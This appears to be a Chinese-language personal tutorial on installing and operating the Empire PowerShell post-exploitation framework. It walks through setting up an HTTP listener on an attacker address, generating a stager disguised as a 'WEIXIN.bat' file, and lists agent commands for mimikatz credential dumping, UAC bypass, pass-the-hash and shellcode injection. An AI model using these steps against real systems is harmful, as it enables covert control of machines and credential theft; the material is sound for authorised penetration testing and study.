我的内网渗透-Empire基本操作

简介

Empire是一个纯粹的PowerShell开发后代理，基于加密安全的通信和灵活的体系结构构建。Empire实现了运行PowerShell代理的功能，而无需powershell.exe，从关键记录器到Mimikatz的可快速部署的利用后模块，以及适应性强的通信以逃避网络检测，所有这些都封装在以可用性为重点的框架中。它于2015年在BSidesLV上首次亮相。

安装

正常情况下

apt-get（具有一定的成功率）

#########################################
新版的不用安装，默认已经安装好了


#########################################
旧版的需要进行手动安装

sudo apt-get update  
#更新库

sudo apt-get install powershell-empire -y  
#安装


###########################
要先打开服务端，在打开客户端

sudo powershell-empire server
#打开empire的服务端
sudo powershell-empire client
#打开客户端，自动连接服务端

apt不行的情况下

github克隆

git clone --recursive https://github.com.cnpmjs.org/BC-SECURITY/Empire.git   
#下载Empire（可能会网络不稳定）
	
cd Empire

#PIP3安装
wget https://bootstrap.pypa.io/get-pip.py
python3 get-pip.py
	
pip install -r requirements.txt  -i https://pypi.douban.com/simple  
#批量安装所需要的Python模块
    M2Crypto报错-》sudo apt install libssl-dev swig  
    # 安装依赖项

sudo ./setup/install.sh   (KALI源不换会很慢)
		vim /etc/apt/sources.list
		deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
		deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
	
pip install poetry （可选）
	
sudo poetry install    
#poetry是Python中用于依赖项管理和打包的工具（可选）
	
sudo poetry run python empire （可选）
	
./Empire/setup/reset.sh   
#重置empire
	
./empire  或 python3 empire 
#运行empire

github下载官网：

https://github.com/BC-SECURITY/Empire/

官方文档（很久没更新，具体使用还得自己研究）

http://www.powershellempire.com/

使用流程

 

监听

(Empire) > uselistener http 
#打开监听模块

(Empire: listeners/http) > info 
#查看当前模块信息

(Empire: uselistener/http) > options
#查看当前模块的配置信息（true的就是需要进行配置的设置）
	

#设置参数：Name、Port、HOST  （这里注意要区分大小写）
set Name L1
set Port 2222
set HOST 192.168.31.24

(Empire: listeners/http) > execute 
#执行监听模块

 

生成stager

(Empire: listeners) > usestager windows/launcher_bat 
#使用launcher_bat模块生成payload
#这个模块目前好像是不生效的，改用windows/hta模块实测有效(不开windows防护可连接，开防护连接不上)

(Empire: stager/windows/launcher_bat) > options   
#查看参数

(Empire: stager/windows/launcher_bat) > set Listener L1  
#匹配监听器（监听器名称）

(Empire: stager/windows/launcher_bat) > set OutFile /root/Desktop/WEIXIN.bat    
#设置输出文件的存放位置和文件名（发现你路径不管设置什么，最终生成的位置都是固定的）

客户端下载执行stager

Active agents: 如果agents是绿色的, 代表是存活的;如果是红色, 那就是掉线的状态.

###########################################
在目标主机下载运行之后，在我们的控制面版会提示：[+] New agent 7FMR6XES checked in，这时候就可以查看下会话连接情况
(Empire: usestager/windows_hta) > agents
#查看连接的会话列表

（Empire）> 模式命令

help = ？       帮助命令
agents          查看代理,进入用户菜单
creds           存放用户的凭据信息 （前提是获取到mimikatz的HASH值）
interact        进入到交互模式
list            列出存活的代理或者监听器
searchmodule    搜索模块
set             设置参数
show            显示参数
uselistener     使用监听器(创建)
usemodule       使用模块
listeners       监听模块
kail   id/all   杀死进程
remove id/all   清除代理

 

interact（shell）命令

可以用help查看可以使用的命令

interact --> 进入到交互模式
kill	 --> 杀死会话
killdate --> 指定日期杀死会话 killdate [agent/all] 01/01/2016
rename	 --> 给agents重命名
searchmodule --> 搜索模块
bypassuac + 监听进程名--> bypassuac提权
jobs      --> 查看工作中的任务
ps        -->获取进程
mimikatz  --> 前提：提权。抓取账号密码(hashdump)
creds     --> 查看账号密码
psinject  --> 利用shellcode进程迁移
pth 	  --> pass the hash
shell + cmd命令 --> 用cmd执行指令
sysinfo   --> 获取系统基本信息
spawn     --> 生成新的agent
	(Empire: 1) > spawn $Listenname
sc          --> 截屏
injectshellcode --> 利用shellcode进程迁移到meterpreter
bypassuac --> 在windows10中失效